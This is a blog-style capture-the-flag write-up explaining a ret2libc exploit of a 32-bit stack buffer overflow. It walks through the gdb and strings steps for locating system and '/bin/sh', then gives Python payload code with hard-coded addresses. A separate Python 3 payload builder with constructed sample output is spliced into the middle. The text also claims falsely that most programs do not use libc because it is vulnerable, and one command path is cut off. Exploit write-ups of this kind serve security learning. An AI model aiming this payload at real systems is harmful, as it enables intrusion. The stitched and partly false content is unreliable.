Hello hackers! hope you are all doing well. It’s been a while since I posted something on my medium page. So without wasting any more of our precious time let us jump straight into hacking.

This particular challenge can be solved in multiple ways but the method I am about to adopt is ret2libc.

So first off…What is libc????

Well, libc stands for the C library. It contains all the functions that a C program needs. For most of the programs coded these days, the libc library is not involved at all because it is quite vulnerable.

Now you may ask: how could a library full of C functions possibly be exploited?

How is it vulnerable?

There is a particular function in C that we are PaRtIcUlArLy interested in ( ಠ◡ಠ ). It's called the system function. With this system function, we can pop open a shell on any system by simply calling it with the right argument. We will basically be crafting our payload to return into libc and execute system("/bin/sh").

As the diagram suggests, first we call the system function, and then at a 4-byte offset (past the fake return address) we have our pointer to /bin/sh.

ENOUGH LECTURE! IT’S BOOORING….. let's start hacking!


Okay, it's time to assemble our avengers (addresses).

First things first, let's find our exact offset.

char buffer[64];
unsigned int ret;

From the program, we understand that there are 4 bytes of ret on top of the stack, then 64 bytes of buffer to overwrite, and then the 4 bytes of saved ebp to overwrite. Now all we have to find is the exact amount of extra padding we need. After a bit of trial and error, I found that it's 8 bytes.

So we need 4+64+4+8=80 bytes to reach the eip region (the saved return address). Now all we have to do is find the addresses of system and /bin/sh. These are the commands and steps to follow:

First, open gdb, set a breakpoint on main and run the program once. Once the program has stopped, we can see the libc that is dynamically linked into our process with the following command:

info proc mapping

On to finding /bin/sh inside libc. We can do so with the following command line: strings -a -t x 'path to libc' | grep '/bin/sh'. In our case it looks like this:

strings -a -t x /lib/ | grep '/bin/sh'

Now we add the start address of the libc mapping (from info proc mapping) to the offset that strings gave us.

AND VOILA!! We have our /bin/sh address in libc. One more address is needed to solve our puzzle: the address of system. It is so simple to find; all we have to do (inside gdb) is:

p system

It's time to put all these pieces together.


As I said earlier, our payload must contain enough padding to reach the eip region, then return into libc, call the system function, and pop open a shell using /bin/sh.

Putting all this together in a Python file, we get this:

padding = 'A'*80

system = '\xb0\xff\xec\xb7'  # address of system in libc, little-endian
ret = 'BBBB'                 # fake return address for system; anything will do
sh = '\xbf\x63\xfb\xb7'      # address of "/bin/sh" in libc, little-endian
print padding + system + ret + sh
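The address arithmetic from the earlier steps (libc base from info proc mapping plus the strings offset) and the final payload layout, as an added Python 3 example that is not part of this write-up: the gdb mapping lines, the strings line and the /tmp/vuln path are constructed samples, the system address is read from the payload bytes above, and the hard-coded addresses only hold while ASLR is disabled for the target.

```python
import re
import struct

# Constructed sample of gdb's `info proc mapping` output (not from the post);
# the first libc.so.6 line gives the load base of libc.
GDB_MAPPINGS = """\
      Start Addr   End Addr       Size     Offset objfile
       0x8048000  0x8049000     0x1000        0x0 /tmp/vuln
      0xb7e59000 0xb8009000   0x1b0000        0x0 /lib/i386-linux-gnu/libc.so.6
      0xb8009000 0xb800b000     0x2000   0x1af000 /lib/i386-linux-gnu/libc.so.6
"""

# Constructed sample line from `strings -a -t x libc.so.6 | grep /bin/sh`.
STRINGS_LINE = "  15d3bf /bin/sh"

SYSTEM_ADDR = 0xb7ecffb0  # the post's system bytes, read as little-endian
PADDING = 80              # 4 (ret) + 64 (buffer) + 4 (ebp) + 8, as in the post


def libc_base(mappings):
    """Start address of the first libc.so.6 mapping, i.e. libc's load base."""
    for line in mappings.splitlines():
        fields = line.split()
        if len(fields) >= 5 and fields[-1].endswith("libc.so.6"):
            return int(fields[0], 16)
    raise ValueError("libc.so.6 not found in the mapping output")

def binsh_offset(strings_line):
    """Hex file offset that `strings -t x` prints in front of /bin/sh."""
    m = re.match(r"\s*([0-9a-fA-F]+)\s+/bin/sh\s*$", strings_line)
    if not m:
        raise ValueError("no /bin/sh offset in: %r" % strings_line)
    return int(m.group(1), 16)

def build_payload(system_addr, binsh_addr, padding=PADDING, fake_ret=b"BBBB"):
    """padding | &system | fake return address | &"/bin/sh" (32-bit cdecl)."""
    p32 = lambda v: struct.pack("<I", v)  # 4 bytes, little-endian
    return b"A" * padding + p32(system_addr) + fake_ret + p32(binsh_addr)

def worked_example():
    """/bin/sh address = libc base + strings offset (string lies in the
    first mapping, which starts at file offset 0); then the full payload."""
    binsh = libc_base(GDB_MAPPINGS) + binsh_offset(STRINGS_LINE)
    return binsh, build_payload(SYSTEM_ADDR, binsh)

if __name__ == "__main__":
    import sys
    sys.stdout.buffer.write(worked_example()[1])  # raw bytes, not a str
```

Unlike the Python 2 print above, this writes raw bytes, so it behaves the same on Python 3 where str and bytes differ.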

And that’s it folks, we have got our shell. Hope you gained a bit of knowledge and understanding from this write-up. If you did, please do consider liking my writeups, and if not…….still consider liking it pleeeeeeaseeee.

Goodbye and happy hacking( ◜◒◝ )♡




Student of sastra deemed university,1nf1n1ty core team member
